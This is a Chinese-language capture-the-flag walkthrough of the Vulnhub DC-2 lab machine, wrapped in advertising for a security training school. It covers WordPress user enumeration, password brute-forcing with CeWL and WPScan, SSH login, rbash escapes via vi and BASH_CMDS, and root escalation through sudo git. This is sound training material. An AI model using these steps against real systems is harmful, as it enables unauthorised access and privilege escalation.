网盾网络安全培训学校育,只培训技术精英
全国免费咨询电话: 15827351614
vlunhub的dc-2靶机笔记

盾叔发现现在网上有许多教程不完整而且不怎么细腻,对新手小白很不友好,今天刷完这个靶机马上拿小本本记下来。

1.官网下载

 

任务目标:拿到4个flag.txt文件

2.使用vbox虚拟机导入

 

3.使用kali进行扫描

arp-scan -l 查看内网网段arp的映射ip

 

4.扫描出80端口进行访问发现页面302

 

直接访问发现永久302所以我们先在kali的host解析文件中添加目标的ip

vim /etc/hosts

添加192.168.0.104 dc-2

 

可以发现网站是wordpress,查看flag发现flag1

 

访问之后发现flag1,提示让我们使用cewl工具生成字典

cewl dc-2 > pwd.txt(生成密码字典)

 

会在目录下生成一个pwd.txt文件

 

我们使用wpscan扫描这个网站

wpsacn --url url地址

wpscan --url url地址 -e u(枚举用户名)

 

发现有三个账户,我们一个个尝试一下爆破

wpscan --url url地址 -U username -P pwd.txt(尝试爆破用户名和密码)

admin没有爆破出来

 

尝试一下jerry,发现密码是adipiscing

 

再爆破一下tom,密码是parturient

 

我们拿到爆破得到的用户名和密码进行登录后台看看

登录之后发现flag2

 

 

后台没有什么上传的地方,wordpress没有插件漏洞后台是比较难拿shell的,版本发现是5.7.1的

我们把拿到的账号和密码尝试使用ssh登录发现tom是可以登录ssh的

jerry登录失败

 

ssh -p 7744 tom@192.168.0.101(ssh登录)

 

连接之后发现flag3.txt,查看shell当前状态发现是rbash(受限制的bash环境)

 

whoami都无法正常执行使用echo /home/tom/usr/bin/*查看可以执行的命令

 

发现该用户可以执行的命令只有这些,发现vi可以使用,使用vi编辑器突破rbash

vi

:set shell=/bin/sh

:shell(进入sh命令行)

 

之后使用export PATH=
/usr/bin:/usr/sbin:/bin:/sbin即可

 

第二种方法突破rbash环境

BASH_CMDS[a]=/bin/sh;a(将sh赋值给a)

/bin/bash(进入bash命令行)

export PATH=$PATH:/bin/(导出路径)

export PATH=$PATH:/usr/bin/即可

 

查看flag发现要我们切换到jerry账户

 

使用之前爆破的密码登录

 

查看是否有可以提权的命令

 

发现没有可以利用的命令,也没有发现可以读写的文件

 

再使用sudo -l查看一下有没有可以利用的命令

 

发现git是可以利用的

使用sudo git help config进入文本模式

!/bin/bash即可进入root的shell

 

 

进入root权限之后发现flag4.txt

 

进入根目录发现最总的flag

 

到此渗透结束

网盾科技安全学院真正的计算机网络信息安全集训基地,面向行业用人特点,为企业培养内核级的计算机信息安全人才,全国资深安全专家亲自授课攻防实验室,专业的安全攻防实验室,免费试听真正意义上的攻防对决。